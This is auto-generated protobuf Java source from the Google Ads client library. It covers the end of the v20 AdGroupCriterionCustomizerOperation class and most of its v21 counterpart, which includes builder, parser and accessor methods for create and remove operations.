operationCase_ = 2; operation_ = other.operation_; onChanged(); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getCreateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); operationCase_ = 2; operation_ = s; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder> createBuilder_; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer getCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } else { if (operationCase_ == 1) { return createBuilder_.getMessage(); } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate(com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { createBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate( com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder builderForValue) { if (createBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { createBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder mergeCreate(com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance()) { operation_ = com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.newBuilder((com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { createBuilder_.mergeFrom(value); } else { createBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder clearCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } createBuilder_.clear(); } return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder getCreateBuilder() { return getCreateFieldBuilder().getBuilder(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if ((operationCase_ == 1) && (createBuilder_ != null)) { return createBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer create = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder> getCreateFieldBuilder() { if (createBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } createBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizerOrBuilder>( (com.google.ads.googleads.v20.resources.AdGroupCriterionCustomizer) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return createBuilder_; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ @java.lang.Override public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ @java.lang.Override public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } else { return (java.lang.String) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ @java.lang.Override public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The remove to set. * @return This builder for chaining. */ public Builder setRemove( java.lang.String value) { if (value == null) { throw new NullPointerException(); } operationCase_ = 2; operation_ = value; onChanged(); return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return This builder for chaining. */ public Builder clearRemove() { if (operationCase_ == 2) { operationCase_ = 0; operation_ = null; onChanged(); } return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The bytes for remove to set. * @return This builder for chaining. */ public Builder setRemoveBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); operationCase_ = 2; operation_ = value; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation) private static final com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation(); } public static com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> PARSER = new com.google.protobuf.AbstractParser<AdGroupCriterionCustomizerOperation>() { @java.lang.Override public AdGroupCriterionCustomizerOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,915
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/AdGroupCriterionCustomizerOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/services/ad_group_criterion_customizer_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.services; /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation} */ public final class AdGroupCriterionCustomizerOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) AdGroupCriterionCustomizerOperationOrBuilder { private static final long serialVersionUID = 0L; // Use AdGroupCriterionCustomizerOperation.newBuilder() to construct. private AdGroupCriterionCustomizerOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdGroupCriterionCustomizerOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new AdGroupCriterionCustomizerOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.Builder.class); } private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { CREATE(1), REMOVE(2), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return CREATE; case 2: return REMOVE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int CREATE_FIELD_NUMBER = 1; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer getCreate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } public static final int REMOVE_FIELD_NUMBER = 2; /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, operation_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_); } if (operationCase_ == 2) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, operation_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation)) { return super.equals(obj); } com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation other = (com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) obj; if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getCreate() .equals(other.getCreate())) return false; break; case 2: if (!getRemove() .equals(other.getRemove())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); switch (operationCase_) { case 1: hash = (37 * hash) + CREATE_FIELD_NUMBER; hash = (53 * hash) + getCreate().hashCode(); break; case 2: hash = (37 * hash) + REMOVE_FIELD_NUMBER; hash = (53 * hash) + getRemove().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (create, remove) on a customizer attribute. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.class, com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.Builder.class); } // Construct using com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.newBuilder() private Builder() { } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (createBuilder_ != null) { createBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerServiceProto.internal_static_google_ads_googleads_v21_services_AdGroupCriterionCustomizerOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation build() { com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation buildPartial() { com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result = new com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result) { int from_bitField0_ = bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && createBuilder_ != null) { result.operation_ = createBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) { return mergeFrom((com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation other) { if (other == com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation.getDefaultInstance()) return this; switch (other.getOperationCase()) { case CREATE: { mergeCreate(other.getCreate()); break; } case REMOVE: { operationCase_ = 2; operation_ = other.operation_; onChanged(); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getCreateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); operationCase_ = 2; operation_ = s; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder> createBuilder_; /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return Whether the create field is set. */ @java.lang.Override public boolean hasCreate() { return operationCase_ == 1; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> * @return The create. */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer getCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } else { if (operationCase_ == 1) { return createBuilder_.getMessage(); } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate(com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { createBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder setCreate( com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder builderForValue) { if (createBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { createBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder mergeCreate(com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer value) { if (createBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance()) { operation_ = com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.newBuilder((com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { createBuilder_.mergeFrom(value); } else { createBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * 